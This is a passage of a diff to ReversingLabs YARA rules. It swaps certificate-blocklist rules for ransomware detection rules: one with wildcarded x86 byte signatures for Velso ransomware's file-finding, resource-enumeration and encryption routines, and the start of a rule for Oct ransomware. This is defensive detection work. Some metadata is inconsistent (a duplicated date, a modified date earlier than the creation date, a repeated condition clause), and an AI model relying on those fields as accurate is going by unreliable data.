+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Velso.yara#L1-L230"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "602be848a26106a1bd46cfc515578f0628687e6cb352e609a274220a61bcb620"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Velso"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 A5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? C9 C3 C7 04 24 ?? ?? ?? ?? 8B 4D ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ??
+            ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ??
+            ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ??
+            85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ??
+            C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ??
+            E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ??
+            ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ??
+            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 4D ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89
+            04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ??
+            89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24
+        }
+		$find_files_p2 = {
+            8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 52 8D 95
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ??
+            EB ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 52 52 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 51 51 74 ??
+            8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 74 ??
+            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 89 85 ?? ?? ?? ??
+            8B 45 ?? 8B 51 ?? 8D 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 51 89 44 24 ?? 8B 45 ?? 89 44 24
+            ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ??
+            8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89
+            44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 87 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
+        }
+		$enum_resources_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 85 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
+            ?? C9 C2 ?? ?? 8B 45 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 EC ?? 85 C0 89 85 ?? ?? ?? ?? 74 ?? 90 8D B4 26 ?? ?? ?? ?? 8B 45 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ??
+            89 54 24 ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
+            85 C0 0F 94 C0 0F B6 C0 89 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
+        }
+		$enum_resources_p2 = {
+            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 8B 40 ?? 89 85
+            ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 45 ?? ?? 8B
+            85 ?? ?? ?? ?? 39 45 ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 8D 45 ?? 8B 4D
+            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 0F 84
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D 45 ?? 8B
+            4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 45
+            ?? 85 D2 89 45 ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89
+            44 24 ?? 8B 85 ?? ?? ?? ?? 8D 4D ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D
+            55 ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_files_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6
+            45 ?? ?? C7 45 ?? ?? ?? ?? ?? 03 48 ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 01 C7 04 24 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 51 ?? 8D
+            8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 8D 8D ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 03 48 ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0
+            74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B
+        }
+		$encrypt_files_p2 = {
+            40 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C9 C3 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 EC ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 77 ?? 8B 85
+            ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 0F 0B 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74
+            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
+        }
+		$encrypt_files_p3 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 55 89 E5 81
+            EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B
+            45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
+            8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39
+        }
+		$encrypt_files_p4 = {
+            D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 75 ?? C6 45 ?? ?? 8D 45 ?? 89 04 24
+            E8 ?? ?? ?? ?? 0F B6 45 ?? C9 C3 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D
+            ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83
+            EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7
+            04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83
+            EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B
+            51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ??
+            8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ??
+            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45
+        }
+		$encrypt_files_p5 = {
+            8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ??
+            39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D
+            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ??
+            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24
+            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ??
+            ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+        }
+		$encrypt_files_p6 = {
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 8B 00
+            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 85 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8D 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 3D ??
+            ?? ?? ?? 77 ?? 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 EC ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45
+            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? C7 44 24 ?? ?? ?? ?? ?? 89 C1 89 54 24 ?? 8B 45
+            ?? 89 44 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 3B 55 ?? 89 95 ?? ?? ?? ?? 0F 85 ?? ?? ??
+            ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C1 E8 ?? 89 8D ?? ?? ?? ?? 85 C0
+            89 85 ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 89 85 ??
+            ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 45 ?? ?? 83 85 ?? ?? ?? ??
+            ?? 8B 55 ?? 39 95 ?? ?? ?? ?? 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+        }
+		$encrypt_files_p7 = {
+            C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 4D ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? 89 4C 24
+            ?? 8B 95 ?? ?? ?? ?? 89 54 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 83 EC ?? 3B 4D ?? 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 89 14 24 E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? C6 45 ??
+            ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52
+            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
+            ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 04 24 C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 50 8D 4D ?? 8B 45 ?? 39 C8 74 ?? 89 04 24 E8 ??
+            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 89 45 ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "06:7d:ff:c5:e3:02:6e:b4:c6:29:71:c9:8a:c8:a9:00" and 1552176000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B1Da219688E51Fd0Bfac2C891D56Cbb8 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Oct : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Oct ransomware."
 		author = "ReversingLabs"
-		id = "245c582a-b168-53ce-9a3c-b291ae5bc2a0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e811a0ba-52df-5e88-ab71-df91d5cb584a"
+		date = "2025-10-15"
+		date = "2025-10-15"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3062-L3080"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "03549214940a8689213bd2eb891da1c1991627c81c8b7f26860141c397409d46"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Oct.yara#L1-L68"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3973794d6bf26eaa752cfc70a217c059a190c63a0dd92b06de7c0893d92d9e88"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
